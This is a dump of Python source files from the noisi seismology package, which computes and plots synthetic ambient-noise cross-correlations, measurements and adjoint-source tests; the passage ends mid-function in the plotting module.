"num_lines": 25,
"path": "/noisi/util/setup_new.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport io\nimport time\nimport json\nfrom noisi import _ROOT\n\ndef setup_proj(project_name):\n\n os.makedirs(os.path.join(project_name))\n \n with io.open(os.path.join(_ROOT,'config','config.json'),'r+') as fh:\n conf = json.loads(fh.read())\n \n conf['date_created'] = time.strftime(\"%Y.%m.%d\")\n conf['project_name'] = project_name\n conf['project_path'] = os.path.abspath(project_name)\n\n \n with io.open(os.path.join(project_name,'config.json'),'w') as fh:\n cf = json.dumps(conf,sort_keys=False, indent=4, separators=(\",\", \": \"))\n fh.write(cf)\n \n # Copy gaussian grid notebook\n os.system('cp {} {}'.format(os.path.join(_ROOT,'jnotebks/setup_gaussian_grid.ipynb'),\n project_name))\n"
},
{
"alpha_fraction": 0.5815004706382751,
"alphanum_fraction": 0.6071105599403381,
"avg_line_length": 27.84347915649414,
"blob_id": "caeb0296d7368ff3533b2640a49e822440c5cfed",
"content_id": "a0717a26bef4ac47755b3bf662f9cfc61e7a3065",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3319,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 115,
"path": "/noisi/test/check_adjstf.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom obspy import Trace\nfrom noisi.scripts import measurements as rm\nfrom noisi.scripts import adjnt_functs as af\nfrom scipy.signal import hilbert\n\n# more or less copying Korbi's test with my measurement and adjoint source \n\n\n# *********************************************\n# input:\n# *********************************************\n#scale = 1e20 #ununsed\nsteps = np.arange(-14, 0, 0.1)\nmtype = 'square_envelope'#'ln_energy_ratio'\nsacdict = {'dist':1e6}\ng_speed = 3700.\nwindow_params = {}\nwindow_params['hw'] = 200\nwindow_params['sep_noise'] = 1.\nwindow_params['win_overlap'] = False\nwindow_params['wtype'] = 'hann'\nwindow_params['causal_side'] = False\nwindow_params['plot'] = False\n# *********************************************\n# *********************************************\n\n# only for testing the test:\n# def l2_simple(tr_1,tr_2):\n# \tmf = np.sum(0.5 * (tr_1.data - tr_2.data) **2)\n# \tadstf = (tr_1.data - tr_2.data)\n# \treturn mf,adstf\n\nm_a_options = {'g_speed':g_speed,'window_params':window_params}\nm_func = rm.get_measure_func(mtype)\na_func = af.get_adj_func(mtype)\n\n\n# create observed data, synthetics and perturbation\nc_obs = 2 * (np.random.rand(2401,) - 0.5)\nc_ini = 2 * (np.random.rand(2401,) - 0.5)\nd_c = 2 * (np.random.rand(2401,) - 0.5)\n# form traces (measurement script works with obspy trace objects, not pure arrays)\nc_obs = Trace(data=c_obs)\nc_obs.stats.sampling_rate = 1.0\nc_obs.stats.sac = sacdict\n\nc_syn = Trace(data=c_ini)\nc_syn.stats.sampling_rate = 1.0\nc_syn.stats.sac = sacdict\n\n#tr_taper_filter = Trace(data=np.ones(c_obs.stats.npts))\n\n# obtain a measurement and an adjoint source time function\n# for the unperturbed measurement\nmsr_o = m_func(c_obs,**m_a_options)\nmsr_s = m_func(c_syn,**m_a_options)\ndata, success = a_func(c_obs,c_syn,**m_a_options)\n\n\nif mtype == 'energy_diff':\n\tdata = data[0] + data[1]\n\tmsr_s = msr_s[0] + msr_s[1]\n\tmsr_o = msr_o[0] + msr_o [1]\n\tdata *= (msr_s-msr_o)\n\nelif mtype == 'ln_energy_ratio':\n\tdata *= (msr_s-msr_o)\n\nelif mtype == 'windowed_waveform':\n\tpass\n#elif mtype == 'envelope':\n#\tdata = data[0] + data[1]\n\nif mtype in ['ln_energy_ratio','energy_diff']:\n\tj = 0.5*(msr_s-msr_o)**2\nelif mtype in ['windowed_waveform','square_envelope','envelope']:\n\tj = 0.5 * np.sum(np.power((msr_s-msr_o),2))\n\n# testing the test:\n# j,data = l2_simple(c_syn,c_obs)\n\n# left hand side of test 1: adjt source time function * du = change of misfit wrt u\ndjdc = np.dot(data,d_c) \n\n#if mtype in ['envelope','square_envelope']:\n#\tdjdc = np.dot(data[0],d_c)\n\t#djdc += np.dot(data[1],d_c)\n\n# right hand side of test 1: Finite difference approx of misfit change for different steps\n\n\ndcheck = []\nd_ch = c_syn.copy()\n\n\nfor step in steps:\n\td_ch.data = c_ini + 10. ** step * d_c\n\tmsr_sh = m_func(d_ch,**m_a_options)\n\tif mtype == 'energy_diff':\t\n\t\tmsr_sh = msr_sh[0] + msr_sh[1]\n\n\tjh = 0.5 * (msr_sh - msr_o)**2\n\tif mtype in ['windowed_waveform','envelope','square_envelope']:\n\t\tjh = 0.5 * np.sum(np.power((msr_sh-msr_o),2))\n\t# testing the test:\n\t# jh, dn = l2_simple(d_ch,c_obs)\n\tdjdch = (jh - j) / (10.**step) \n\tdcheck.append(abs(djdc - djdch) / abs(djdc))\n\t\n# plot\nplt.semilogy(steps,dcheck)\nplt.title(\"Check for adjoint source time function\")\nplt.show()\n\n\n"
},
{
"alpha_fraction": 0.5622403025627136,
"alphanum_fraction": 0.5796077847480774,
"avg_line_length": 33.2849006652832,
"blob_id": "3c8d89171cc0cc2fa878efa21ca9b2aad7d7868e",
"content_id": "23ce0435bfe171dbbc46ca65b1c3e7e6f16a076a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12034,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 351,
"path": "/noisi/scripts/run_correlation.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nfrom mpi4py import MPI\nimport numpy as np\nimport os\nimport h5py\nimport json\nimport click\nfrom glob import glob\nfrom math import ceil\nfrom scipy.signal.signaltools import fftconvolve\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\n \nfrom obspy import Trace, read, Stream\nfrom noisi import NoiseSource, WaveField\nfrom noisi.util import geo#, natural_keys\nfrom obspy.signal.invsim import cosine_taper\nfrom noisi.util import filter\ntry:\n from scipy.signal import sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\nfrom noisi.util.windows import my_centered, zero_buddy\nfrom noisi.util.geo import geograph_to_geocent\nfrom noisi.util.corr_pairs import define_correlationpairs,rem_fin_prs,rem_no_obs\nimport matplotlib.pyplot as plt\nimport instaseis\n\n\n#ToDo: put in the possibility to run on mixed channel pairs\ndef paths_input(cp,source_conf,step,ignore_network,instaseis):\n \n inf1 = cp[0].split()\n inf2 = cp[1].split()\n \n conf = json.load(open(os.path.join(source_conf['project_path'],'config.json')))\n channel = source_conf['channel']\n \n # station names\n if ignore_network:\n sta1 = \"*.{}..{}\".format(*(inf1[1:2]+[channel]))\n sta2 = \"*.{}..{}\".format(*(inf2[1:2]+[channel]))\n else:\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n\n\n # Wavefield files \n if instaseis == False:\n if source_conf['preprocess_do']:\n dir = os.path.join(source_conf['source_path'],'wavefield_processed')\n \n else:\n dir = conf['wavefield_path']\n \n wf1 = glob(os.path.join(dir,sta1+'.h5'))[0]\n wf2 = glob(os.path.join(dir,sta2+'.h5'))[0]\n else:\n # need to return two receiver coordinate pairs. For buried sensors, depth could be used but no elevation is possible, \n \n # so maybe keep everything at 0 m?\n # lists of information directly from the stations.txt file.\n wf1 = inf1\n wf2 = inf2\n\n \n # Starting model for the noise source\n nsrc = os.path.join(source_conf['project_path'],\n source_conf['source_name'],'step_'+str(step),\n 'starting_model.h5')\n\n \n return(wf1,wf2,nsrc)\n \n \ndef path_output(cp,source_conf,step):\n \n\n id1 = cp[0].split()[0]+cp[0].split()[1]\n id2 = cp[1].split()[0]+cp[1].split()[1]\n\n if id1 < id2 :\n inf1 = cp[0].split()\n inf2 = cp[1].split()\n else:\n inf2 = cp[0].split()\n inf1 = cp[1].split()\n\n channel = source_conf['channel']\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n\n \n corr_trace_name = \"{}--{}.sac\".format(sta1,sta2) \n corr_trace_name = os.path.join(source_conf['source_path'],\n 'step_'+str(step),'corr',\n corr_trace_name) \n\n return corr_trace_name\n \ndef get_ns(wf1,source_conf,insta):\n \n # Nr of time steps in traces\n if insta:\n # get path to instaseis db\n #ToDo: ugly.\n dbpath = json.load(open(os.path.join(source_conf['project_path'],\n 'config.json')))['wavefield_path']\n # open \n db = instaseis.open_db(dbpath)\n # get a test seismogram to determine...\n stest = db.get_seismograms(source=instaseis.ForceSource(latitude=0.0,\n longitude=0.0),receiver=instaseis.Receiver(latitude=10.,\n longitude=0.0),dt=1./source_conf['sampling_rate'])[0]\n \n nt = stest.stats.npts\n Fs = stest.stats.sampling_rate\n else:\n with WaveField(wf1) as wf1:\n nt = int(wf1.stats['nt'])\n Fs = round(wf1.stats['Fs'],8)\n \n # Necessary length of zero padding for carrying out frequency domain correlations/convolutions\n n = next_fast_len(2*nt-1) \n \n # Number of time steps for synthetic correlation\n n_lag = int(source_conf['max_lag'] * Fs)\n if nt - 2*n_lag <= 0:\n click.secho('Resetting maximum lag to %g seconds: Synthetics are too\\\n short for a maximum lag of %g seconds.' %(nt//2/Fs,n_lag/Fs))\n n_lag = nt // 2\n \n n_corr = 2*n_lag + 1\n \n return nt,n,n_corr,Fs\n \n \ndef g1g2_corr(wf1,wf2,corr_file,src,source_conf,insta):\n \"\"\"\n Compute noise cross-correlations from two .h5 'wavefield' files.\n Noise source distribution and spectrum is given by starting_model.h5\n It is assumed that noise sources are delta-correlated in space.\n \"\"\"\n \n \n #ToDo: check whether to include autocorrs from user (now hardcoded off)\n #ToDo: Parallel loop(s)\n #ToDo tests\n \n\n # Metainformation: Include the reference station names for both stations\n # from wavefield files, if possible. Do not include geographic information\n # from .csv file as this might be error-prone. Just add the geographic \n # info later if needed.\n\n with NoiseSource(src) as nsrc:\n\n ntime, n, n_corr, Fs = get_ns(wf1,source_conf,insta)\n\n # use a one-sided taper: The seismogram probably has a non-zero end, \n # being cut off whereever the solver stopped running.\n taper = cosine_taper(ntime,p=0.01)\n taper[0:ntime//2] = 1.0\n ntraces = nsrc.src_loc[0].shape[0]\n print(taper.shape)\n correlation = np.zeros(n_corr)\n\n if insta:\n # open database\n dbpath = json.load(open(os.path.join(source_conf['project_path'],\n 'config.json')))['wavefield_path']\n # open and determine Fs, nt\n db = instaseis.open_db(dbpath)\n # get receiver locations\n lat1 = geograph_to_geocent(float(wf1[2]))\n lon1 = float(wf1[3])\n rec1 = instaseis.Receiver(latitude=lat1,longitude=lon1)\n lat2 = geograph_to_geocent(float(wf2[2]))\n lon2 = float(wf2[3])\n rec2 = instaseis.Receiver(latitude=lat2,longitude=lon2)\n\n else:\n wf1 = WaveField(wf1)\n wf2 = WaveField(wf2)\n\n \n # Loop over source locations\n for i in range(ntraces):\n\n # noise source spectrum at this location\n S = nsrc.get_spect(i)\n \n\n if S.sum() == 0.: \n #If amplitude is 0, continue. (Spectrum has 0 phase anyway. )\n continue\n\n \n if insta:\n # get source locations\n lat_src = geograph_to_geocent(nsrc.src_loc[1,i])\n lon_src = nsrc.src_loc[0,i]\n fsrc = instaseis.ForceSource(latitude=lat_src,\n longitude=lon_src,f_r=1.e12)\n \n s1 = np.ascontiguousarray(db.get_seismograms(source=fsrc,\n receiver=rec1,\n dt=1./source_conf['sampling_rate'])[0].data*taper)\n s2 = np.ascontiguousarray(db.get_seismograms(source=fsrc,\n receiver=rec2,\n dt=1./source_conf['sampling_rate'])[0].data*taper)\n \n\n else:\n # read Green's functions\n s1 = np.ascontiguousarray(wf1.data[i,:]*taper)\n s2 = np.ascontiguousarray(wf2.data[i,:]*taper)\n \n \n # Fourier transform for greater ease of convolution\n spec1 = np.fft.rfft(s1,n)\n spec2 = np.fft.rfft(s2,n)\n \n # convolve G1G2\n g1g2_tr = np.multiply(np.conjugate(spec1),spec2)\n \n # convolve noise source\n c = np.multiply(g1g2_tr,S)\n \n # transform back \n correlation += my_centered(np.fft.ifftshift(np.fft.irfft(c,n)),\n n_corr) * nsrc.surf_area[i]\n \n # occasional info\n if i%50000 == 0:\n print(\"Finished {} source locations.\".format(i))\n###################### end of loop over all source locations ###################\n\n if not insta:\n wf1.file.close()\n wf2.file.close()\n\n # save output\n trace = Trace()\n trace.stats.sampling_rate = Fs\n trace.data = correlation\n# try to add some meta data\n try:\n sta1 = wf1.stats['reference_station']\n sta2 = wf2.stats['reference_station']\n trace.stats.station = sta1.split('.')[1]\n trace.stats.network = sta1.split('.')[0]\n trace.stats.location = sta1.split('.')[2]\n trace.stats.channel = sta1.split('.')[3]\n trace.stats.sac = {}\n trace.stats.sac['kuser0'] = sta2.split('.')[1]\n trace.stats.sac['kuser1'] = sta2.split('.')[0]\n trace.stats.sac['kuser2'] = sta2.split('.')[2]\n trace.stats.sac['kevnm'] = sta2.split('.')[3]\n except:\n pass\n\n trace.write(filename=corr_file,format='SAC')\n \n\n\ndef run_corr(source_configfile,step,steplengthrun=False,ignore_network=False):\n\n\n # simple embarrassingly parallel run:\n\n comm = MPI.COMM_WORLD\n size = comm.Get_size()\n rank = comm.Get_rank()\n\n step = int(step)\n\n # get configuration\n source_config=json.load(open(source_configfile))\n obs_only = source_config['model_observed_only']\n insta = json.load(open(os.path.join(source_config['project_path'],\n 'config.json')))['instaseis']\n auto_corr = False # default value\n try:\n auto_corr = source_config['get_auto_corr']\n except KeyError:\n pass\n\n # get possible station pairs\n p = define_correlationpairs(source_config['project_path'],\n auto_corr=auto_corr)\n if rank == 0:\n print('Nr all possible correlation pairs %g ' %len(p))\n \n # Remove pairs for which no observation is available\n if obs_only and not steplengthrun:\n directory = os.path.join(source_config['source_path'],'observed_correlations')\n p = rem_no_obs(p,source_config,directory=directory)\n if rank == 0:\n print('Nr correlation pairs after checking available observ. %g ' %len(p))\n if steplengthrun:\n directory = os.path.join(source_config['source_path'],\n 'step_'+str(step),'obs_slt')\n p = rem_no_obs(p,source_config,directory=directory)\n if rank == 0:\n print('Nr correlation pairs after checking available observ. %g ' %len(p))\n\n # Remove pairs that have already been calculated\n p = rem_fin_prs(p,source_config,step)\n if rank == 0:\n print('Nr correlation pairs after checking already calculated ones %g ' %len(p))\n print(16*'*') \n \n\n # The assignment of station pairs should be such that one core has as\n # many occurrences of the same station as possible; \n # this will prevent that many processes try to access the same hdf5 \n # file all at once.\n num_pairs = int( ceil(float(len(p))/float(size)) )\n p_p = p[ rank*num_pairs : rank*num_pairs + num_pairs] \n \n print('Rank number %g' %rank)\n print('working on pair nr. %g to %g of %g.' %(rank*num_pairs,\n rank*num_pairs+num_pairs,len(p)))\n\n for cp in p_p:\n \n # try except is used here because of the massively parallel loop. \n # it needs to tolerate a couple of messups (e.g. a wavefield is \n # requested that isn't in the database)\n # if unknown errors occur and no correlations are computed, comment try-\n # except to see the error messages.\n #try:\n wf1,wf2,src = paths_input(cp,source_config,\n step,ignore_network,insta)\n print(wf1,wf2,src)\n corr = path_output(cp,source_config,step)\n print(corr) \n #except:\n # print('Could not determine correlation for: %s\\\n # \\nCheck if wavefield .h5 file is available.' %cp)\n # continue\n \n if os.path.exists(corr):\n continue\n\n g1g2_corr(wf1,wf2,corr,src,source_config,insta=insta)\n\n return()\n"
},
{
"alpha_fraction": 0.6012781262397766,
"alphanum_fraction": 0.6123923063278198,
"avg_line_length": 27.79199981689453,
"blob_id": "60dc4846c68c8d0db9ddabaed71816e20ebf43e4",
"content_id": "ab654ac599da8590601cf1d1688285d7d97b451b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3599,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 125,
"path": "/noisi/scripts/measurements.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom scipy.signal import hilbert\nfrom math import pi, log\nfrom noisi.util.windows import get_window,my_centered\ntry:\n from noisi.util.plot import plot_window, plot_envelope\nexcept:\n pass\n\n\ndef square_envelope(correlation,g_speed,window_params):\n \n square_envelope = correlation.data**2 + np.imag(hilbert(correlation.data))**2\n if window_params['plot']:\n plot_envelope(correlation,square_envelope)\n \n return square_envelope\n\n\ndef windowed_envelope(correlation,plot=False):\n pass\n\n\ndef windowed_waveform(correlation,g_speed,window_params):\n window = get_window(correlation.stats,g_speed,window_params)\n win = window[0]\n if window[2]:\n win_caus = (correlation.data * win)\n win_acaus = (correlation.data * win[::-1])\n msr = win_caus+win_acaus\n else:\n msr = win-win+np.nan\n return msr\n\n\ndef energy(correlation,g_speed,window_params):\n\n window = get_window(correlation.stats,g_speed,window_params)\n msr = [np.nan,np.nan]\n #if window_params['causal_side']:\n win = window[0]\n #else:\n # win = window[0][::-1]\n if window[2]:\n\n # causal\n E = np.trapz((correlation.data * win)**2)\n msr[0] = E\n if window_params['plot']:\n plot_window(correlation,win,E)\n\n # acausal\n win = win[::-1]\n E = np.trapz((correlation.data * win)**2)\n msr[1] = E\n if window_params['plot']:\n plot_window(correlation,win,E)\n\n return np.array(msr)\n\ndef log_en_ratio(correlation,g_speed,window_params):\n delta = correlation.stats.delta\n window = get_window(correlation.stats,g_speed,window_params)\n win = window[0]\n data = my_centered(correlation.data,correlation.stats.npts)\n\n if window[2]:\n #E_plus = np.trapz((correlation.data * win)**2) * delta\n #E_minus = np.trapz((correlation.data * win[::-1])**2) * delta\n sig_c = correlation.data * win\n sig_a = correlation.data * win[::-1]\n E_plus = np.trapz(np.power(sig_c,2))*delta\n E_minus = np.trapz(np.power(sig_a,2))*delta\n msr = log(E_plus/E_minus)#+np.finfo(E_minus).tiny))\n if window_params['plot']:\n plot_window(correlation,win,msr)\n else:\n msr = np.nan\n return msr\n\n# This is a bit problematic cause here the misfit already needs\n# to be returned (for practical reasons) -- ToDo think about\n# how to organize this better\ndef inst_mf(corr_obs,corr_syn,g_speed,window_params):\n window = get_window(corr_obs.stats,g_speed,window_params)\n win = window[0]\n\n if window[2]:\n\n\n sig1 = corr_obs.data * (win + win[::-1])\n sig2 = corr_syn.data * (win + win[::-1])\n # phase misfit .. try instantaneous phase\n # hilbert gets the analytic signal (only the name is confusing)\n a1 = hilbert(sig1)\n a2 = hilbert(sig2)\n\n cc = a1*np.conjugate(a2)\n\n boxc = np.clip((win + win[::-1]),0,1)\n dphase = 0.5*np.trapz(np.angle(cc * boxc)**2)\n\n if window_params['plot']:\n plot_window(corr_obs,win,dphase)\n else:\n dphase = np.nan\n\n return dphase\n\ndef get_measure_func(mtype):\n\n if mtype == 'ln_energy_ratio':\n func = log_en_ratio\n elif mtype == 'energy_diff':\n func = energy\n elif mtype == 'square_envelope':\n func = square_envelope\n elif mtype == 'windowed_waveform':\n func = windowed_waveform\n elif mtype == 'inst_phase':\n func = inst_mf\n else:\n msg = 'Measurement functional %s not currently implemented.' %mtype\n raise ValueError(msg)\n return func\n"
},
{
"alpha_fraction": 0.5539682507514954,
"alphanum_fraction": 0.6005290746688843,
"avg_line_length": 28.53125,
"blob_id": "0e711934cac2d7153774cf0be9d7a02e7de0bdd8",
"content_id": "f0a1609b0fd010fcbdb74f73666b09e2a9adf760",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1890,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 64,
"path": "/noisi/util/assign_geodata.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom obspy import read\nfrom obspy.geodetics import gps2dist_azimuth\n\nimport sys\nimport os\nfrom glob import glob\n\nindir = sys.argv[1]\nmetafile = sys.argv[2]\n\nprint(indir)\ntraces = glob(indir+'/*.SAC')\ntraces.extend(glob(indir+'/*.sac'))\nprint('Found traces:\\n')\nprint(traces[0])\nprint('...to...')\nprint(traces[-1])\nprint('Assign geographical information.\\n')\n\nmeta = pd.read_csv(metafile)\n\nfor t in traces:\n tr = read(t)\n sta1 = os.path.basename(t).split('.')[1]\n try:\n sta2 = os.path.basename(t).split('--')[1].split('.')[1]\n except IndexError:\n sta2 = os.path.basename(t).split('.')[5]\n print(sta1,sta2)\n lat1 = float(meta[meta['sta']==sta1].iloc[0]['lat'])\n lat2 = float(meta[meta['sta']==sta2].iloc[0]['lat'])\n lon1 = float(meta[meta['sta']==sta1].iloc[0]['lon'])\n lon2 = float(meta[meta['sta']==sta2].iloc[0]['lon'])\n print(lat1,lon1,lat2,lon2)\n \n tr[0].stats.network = os.path.basename(t).split('.')[0]\n tr[0].stats.station = sta1\n tr[0].stats.location = ''\n tr[0].stats.channel = os.path.basename(t).split('.')[3].split('--')[0]\n tr[0].stats.sac.stlo = lon1\n tr[0].stats.sac.stla = lat1\n tr[0].stats.sac.evlo = lon2\n tr[0].stats.sac.evla = lat2\n tr[0].stats.sac.kuser0 = meta[meta['sta']==sta2].iloc[0]['net']\n \n tr[0].stats.sac.kevnm = sta2\n tr[0].stats.sac.kuser1 = ''\n try:\n tr[0].stats.sac.kuser2 = os.path.basename(t).split('--')[1].split('.')[3]\n except IndexError:\n sta2 = os.path.basename(t).split('.')[7]\n tr[0].stats.sac.user0 = 100. \n #print lat1 > -90.\n #print lat1 < 90.\n #print type(lat1)\n #print(float(lat1))\n #print lat1,lon1,lat2,lon2\n geoinf = gps2dist_azimuth(lat1,lon1,lat2,lon2)\n tr[0].stats.sac.dist = geoinf[0]\n tr[0].stats.sac.az = geoinf[1]\n tr[0].stats.sac.baz = geoinf[2]\n\n tr.write(t,format='SAC')\n"
},
{
"alpha_fraction": 0.5217561721801758,
"alphanum_fraction": 0.5582124590873718,
"avg_line_length": 31.64102554321289,
"blob_id": "f3a1d81a21ba45ffbe44552165840429717199a8",
"content_id": "3e5f992fe5f189c7c9ed2ca8c345bc51ac25b3da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2551,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 78,
"path": "/noisi/util/prepare_sem_input.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport json\nimport os\nimport shutil\nimport io\n\ndef grid_to_specfem_stations(grid,spec_dir):\n \"\"\"\n Write noisesource grid to disk as specfem compatible station list.\n \"\"\"\n \n \n fid = open('temp.txt','w')\n for i in range(len(grid[0,:])):\n fid.write('%08g SRC %10.8f %10.8f 0.0 0.0\\n'\\\n %(i,grid[1,i],grid[0,i]))\n \n fid.close()\n \n for dir in os.listdir(spec_dir):\n dst = os.path.join(spec_dir,dir,'DATA','STATIONS')\n print(dst)\n shutil.copy('temp.txt',dst)\n os.remove('temp.txt')\n \ndef stations_to_cmtsolutions(stationlist,hdur,outdir):\n \n\n fid = open(stationlist,'r')\n stationlist = fid.read().split('\\n')\n \n for i in range(len(stationlist)):\n \n station = stationlist[i]\n if station =='': continue\n \n print(station)\n info = station.split()\n \n id = info[0].strip() + '.' + info[1].strip()\n os.mkdir(os.path.join(outdir,id))\n os.mkdir(os.path.join(outdir,id,'DATA'))\n os.mkdir(os.path.join(outdir,id,'OUTPUT_FILES'))\n os.mkdir(os.path.join(outdir,id,'DATABASES_MPI'))\n \n eventfid = open(os.path.join(outdir,id,'DATA','CMTSOLUTION'),'w')\n \n eventfid.write('*** 2000 1 1 1 01 01.00 '+info[3].strip()+\\\n ' '+info[4].strip()+' '+info[5].strip()+' 0.0 0.0 ***\\n')\n eventfid.write('event name: %s \\n' %id)\n eventfid.write('time shift: 0.0000 \\n')\n eventfid.write('half duration: %s \\n' %str(hdur))\n eventfid.write('latitude: %s \\n' %str(info[3].strip()))\n eventfid.write('longitude: %s \\n' %str(info[4].strip()))\n eventfid.write('depth: %s \\n' %str(info[5].strip()))\n eventfid.write('Mrr: 0.0000000 \\n')\n eventfid.write('Mtt: 0.0000000 \\n')\n eventfid.write('Mpp: 0.0000000 \\n')\n eventfid.write('Mrt: 0.0000000 \\n')\n eventfid.write('Mrp: 0.0000000 \\n')\n eventfid.write('Mtp: 0.0000000 ') \n\n\n\ndef prepare_specfem_input(configfile):\n \n with io.open(configfile,'r') as fh:\n config = json.load(fh)\n \n spec_dir = os.path.join(config['project_path'],'specfem_input') \n os.mkdir(spec_dir)\n grid = np.load(os.path.join(config['project_path'],'sourcegrid.npy'))\n stations = os.path.join(config['project_path'],'stations.txt')\n \n \n \n stations_to_cmtsolutions(stations,config[\"hdur_pointsource\"],spec_dir)\n grid_to_specfem_stations(grid,spec_dir)\n \n"
},
{
"alpha_fraction": 0.5642780065536499,
"alphanum_fraction": 0.5927259922027588,
"avg_line_length": 27.482051849365234,
"blob_id": "2804556c7676a1bbb847a8bc2bd8dcda6e780d02",
"content_id": "9f9f129e7ff8065afb28dc883ea62c664367eb55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5554,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 195,
"path": "/noisi/util/plot.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# plotting on the map\nimport matplotlib as mpl\nmpl.rcParams['font.size'] = 14\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nimport matplotlib.tri as tri\nimport numpy as np\nimport time\n\n\ndef plot_grid(map_x,map_y,map_z,stations=[],v=None,globe=False,\n outfile=None,title=None,shade='flat',cmap=None,\n sequential=False,v_min=None,normalize=False,\n coastres='c',proj='cyl',\n lat_0=None,lon_0=None,lonmin=None,lonmax=None,\n latmin=None,latmax=None,mode='interp',resol=1,alpha=1.0):\n\n if lat_0 is None:\n lat_0 = 0.5*(map_y.max()-map_y.min())\n if lon_0 is None:\n lon_0 = 0.5*(map_x.max()-map_x.min())\n\n if lonmin == None:\n lonmin = np.min(map_x)\n if lonmax == None:\n lonmax = np.max(map_x)\n if latmax == None:\n latmax = np.max(map_y)\n if latmin == None:\n latmin = np.min(map_y)\n\n\n if resol != 1:\n map_x = map_x[::resol]\n map_y = map_y[::resol]\n map_z = map_z[::resol]\n\n\n if not proj == 'ortho':\n m = Basemap(rsphere=6378137,resolution=coastres,\n projection=proj,lat_0=lat_0,lon_0=lon_0,\n llcrnrlat=latmin,urcrnrlat=latmax,\n llcrnrlon=lonmin,urcrnrlon=lonmax)\n else:\n m = Basemap(rsphere=6378137,resolution=coastres,\n projection=proj,lat_0=lat_0,lon_0=lon_0)\n\n plt.figure(figsize=(11,9))\n plt.subplot(111)\n\n if title is not None:\n plt.title(title)\n\n\n\n if normalize:\n map_z /= np.max(np.abs(map_z))\n\n\n if v is None:\n v = np.max(map_z)\n\n if sequential:\n cm = plt.cm.magma\n if v_min == None:\n v_min = 0.\n else:\n cm = plt.cm.bwr\n v_min =-v\n\n if cmap is not None:\n cm = cmap\n\n\n\n\n print('max. value on map: %g' %map_z.max())\n if mode == 'interp':\n pass\n # triangulate first, then project,\n # and use plt.tripcolor to put it on the map.\n triangles = tri.Triangulation(map_x,map_y)\n (triangles.x,triangles.y) = m(triangles.x,triangles.y)\n #if it doesn't work, use pcolor mode\n\n plt.tripcolor(triangles,map_z,shading=shade, vmin=v_min,\n vmax=v,cmap=cm,alpha=alpha,linewidth=0.0,edgecolor='none')\n\n cbar = m.colorbar(location='bottom',pad=0.3)\n\n elif mode == 'pcolor':\n mx, my = m(map_x,map_y)\n m.pcolor(mx,my,map_z,cmap=cm,\n tri=True,shading=shade,vmin=v_min,\n vmax=v,alpha=alpha,linewidth=0.,edgecolor='none')\n cbar = m.colorbar(location='bottom',pad=0.3)\n\n\n elif mode == 'srclocs':\n\n indx = map_x % 3 <= 0.5\n map_x = map_x[indx].astype(int)\n map_y = map_y[indx].astype(int)\n\n indy = map_y % 3 <= 0.5\n\n mx,my = m(map_x[indy],map_y[indy])\n m.scatter(mx,my,marker='o',c='0.5',lw=1.,s=np.ones(len(mx))*0.2)\n\n elif mode == 'srcdots':\n\n\n colors = cm(map_z)\n indx = abs(map_z) > 0.4*np.max(map_z)\n sizes = np.ones(len(map_x))*1\n\n mx,my = m(map_x,map_y)\n\n\n #m.scatter(mx[indx],my[indx],marker='o',c=colors[indx],s=sizes[indx])\n scplt = m.scatter(mx,my,marker='o',c=map_z,cmap=cm,s=sizes)\n cbar = m.colorbar(scplt,location='bottom',pad=0.3)\n\n if normalize and v==1.:\n cbar.set_ticks([-1.0,-0.5,0.,0.5,1.0])\n elif normalize and v!=1.:\n cbar.set_ticks([-v,-v/2.,0.,v/2.,v])\n\n\n if globe:\n m.drawcoastlines(linewidth=1.,color='0.5')\n else:\n m.drawcoastlines(linewidth=1.0)\n\n\n if globe:\n #pass\n m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0],color='0.5') # draw parallels\n m.drawmeridians(np.arange(-180,210,60.),labels=[0,0,0,1],color='0.5') # draw meridians\n\n else:\n if not proj == 'ortho':\n d_lon = round(abs(lonmax-lonmin) / 3.)\n d_lat = round(abs(latmax-latmin) / 3.)\n parallels = np.arange(latmin,latmax,d_lat).astype(int)\n meridians = np.arange(lonmin,lonmax,d_lon).astype(int)\n m.drawparallels(parallels,labels=[1,0,0,0]) # draw parallels\n m.drawmeridians(meridians,labels=[0,0,0,1])\n\n #draw station locations\n for sta in stations:\n m.plot(sta[0],sta[1],'^',color='r',markersize=7,markeredgecolor='0.5',latlon=True)\n #m.plot(sta[0],sta[1],'^',color='lime',markersize=5,markeredgecolor='0.5',latlon=True)\n if outfile is None:\n plt.show()\n else:\n plt.savefig(outfile,dpi=300.)\n plt.close()\n\ndef plot_sourcegrid(gridpoints,**kwargs):\n\n plt.figure()\n plt.subplot(111)\n m = 